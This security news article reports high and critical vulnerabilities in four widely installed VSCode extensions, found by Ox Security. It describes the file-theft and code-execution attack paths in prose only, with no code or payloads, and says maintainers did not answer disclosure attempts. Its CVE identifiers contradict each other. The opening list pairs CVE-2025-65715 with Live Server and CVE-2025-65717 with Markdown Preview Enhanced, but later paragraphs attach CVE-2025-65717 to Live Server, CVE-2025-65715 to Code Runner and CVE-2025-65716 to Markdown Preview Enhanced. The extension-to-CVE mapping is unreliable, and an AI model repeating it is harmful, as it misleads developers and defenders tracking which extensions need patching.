Vulnerabilities with high to critical severity ratings affecting popular Visual Studio Code (VSCode) extensions collectively downloaded more than 128 million times could be exploited to steal local files and execute code remotely.
The security issues impact Live Server (CVE-2025-65715), Code Runner (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned).
Researchers at application security company Ox Security discovered the flaws and tried to disclose them since June 2025. However, the researchers say that no maintainer responded.
Remote code execution in IDE
VSCode extensions are add-ons that expand the functionality of Microsoft's integrated development environment (IDE). They can add language support, debugging tools, themes, and other functionality or customization options.
They run with significant access to the local development environment, including files, terminals, and network resources.
Ox Security published reports for each of the discovered flaws and warned that keeping the vulnerable extensions could expose the corporate environment to lateral movement, data exfiltration, and system takeover.
An attacker exploiting the CVE-2025-65717 critical vulnerability in the Live Server extension (over 72 million downloads on VSCode) can steal local files by directing the target to a malicious webpage.
The CVE-2025-65715 vulnerability in the Code Runner VSCode extension, with 37 million downloads, allows remote code execution by changing the extension's configuration file. This could be achieved through tricking the target into pasting or applying a maliciously configuration snippet in the global settings.json file.
Rated with a high-severity score of 8.8, CVE-2025-65716 affects the Markdown Preview Enhanced (8.5 million downloads) and can be leveraged to execute JavaScript via maliciously crafted Markdown file.
... continue reading